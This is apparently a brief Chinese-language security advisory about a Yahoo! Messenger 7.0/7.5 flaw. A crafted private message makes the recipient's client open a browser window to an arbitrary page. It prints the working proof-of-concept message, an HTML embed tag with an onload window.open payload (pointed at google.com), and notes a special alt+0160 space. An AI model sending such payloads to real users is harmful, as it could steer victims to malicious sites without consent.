Yahoo! Messenger是一款流行的即时通信软件。
Yahoo! Messenger不正确处理恶意消息,远程攻击者可以利用漏洞在目标用户浏览器上打开浏览器窗口到任意页面。
发送如下私有消息给目标用户:
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
注意"helomsg :"这空格必须以alt+0160方法建立。这样的消息可导致yahoo打开浏览器导航到google.com站点。
Yahoo! Messenger 7.5 .814
Yahoo! Messenger 7.0 .438
<a href="http://messenger.yahoo.com/" target="_blank">http://messenger.yahoo.com/</a>
京公网安备 11010502034610号
暂无评论